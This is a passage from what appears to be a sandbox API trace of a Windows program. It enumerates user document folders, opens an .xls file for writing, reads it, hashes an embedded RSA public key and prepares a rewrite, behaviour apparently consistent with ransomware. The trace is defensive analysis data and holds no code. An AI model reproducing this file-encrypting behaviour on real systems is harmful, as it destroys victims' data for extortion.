lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0195.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0195.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0195.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.035] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\") returned="noOiZR\\" [0195.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.036] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\") returned="UHfBjIaC\\" [0195.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0195.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.037] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\") returned="AzlD\\" [0195.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0195.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.037] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0195.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f090 | out: hHeap=0x6a0000) returned 1 [0195.037] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0195.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.038] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.039] PathFindFileNameW (pszPath="") returned="" [0195.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.039] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c62c90, ftCreationTime.dwHighDateTime=0x1d89a59, ftLastAccessTime.dwLowDateTime=0x4544e880, ftLastAccessTime.dwHighDateTime=0x1d89f7a, ftLastWriteTime.dwLowDateTime=0x4544e880, ftLastWriteTime.dwHighDateTime=0x1d89f7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0195.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.044] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7c62c90, ftCreationTime.dwHighDateTime=0x1d89a59, ftLastAccessTime.dwLowDateTime=0x4544e880, ftLastAccessTime.dwHighDateTime=0x1d89f7a, ftLastWriteTime.dwLowDateTime=0x4544e880, ftLastWriteTime.dwHighDateTime=0x1d89f7a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.044] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x357b4680, ftCreationTime.dwHighDateTime=0x1d8a450, ftLastAccessTime.dwLowDateTime=0x85d11010, ftLastAccessTime.dwHighDateTime=0x1d8a6b2, ftLastWriteTime.dwLowDateTime=0x85d11010, ftLastWriteTime.dwHighDateTime=0x1d8a6b2, nFileSizeHigh=0x0, nFileSizeLow=0xc025, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8NQv3A3M cCCF.xls", cAlternateFileName="8NQV3A~1.XLS")) returned 1 [0195.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0195.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0195.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0195.045] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\8NQv3A3M cCCF.xls") returned=".xls" [0195.045] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\UHfBjIaC\\noOiZR\\8NQv3A3M cCCF.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\uhfbjiac\\nooizr\\8nqv3a3m cccf.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.046] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=49189) returned 1 [0195.046] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.050] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xbfff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.050] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.052] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.052] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xc025, lpOverlapped=0x0) returned 1 [0195.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.053] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0195.054] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.054] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.054] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.054] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.054] GetLastError () returned 0x0 [0195.074] GetLastError () returned 0x0 [0195.074] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.074] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0195.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.074] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.075] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.075] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0195.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0195.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc030) returned 0x2d49778 [0195.075] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.075] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f090 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e318 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f0d8 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a108 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a120 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.076] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a120 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a0a8 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a120 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.079] GetCurrentThreadId () returned 0x264 [0195.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46750 [0195.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0195.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.080] GetCurrentThreadId () returned 0x264 [0195.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.081] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0c0 [0195.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a0a8 [0195.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0195.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a120 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a060 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0f0 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a078 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a090 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0d8 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a090 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a090 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a0a8 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0c0 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0d8 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d3b678 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0195.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a0a8 | out: hHeap=0x6a0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fc90 [0195.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.086] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0195.086] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0195.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.087] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: 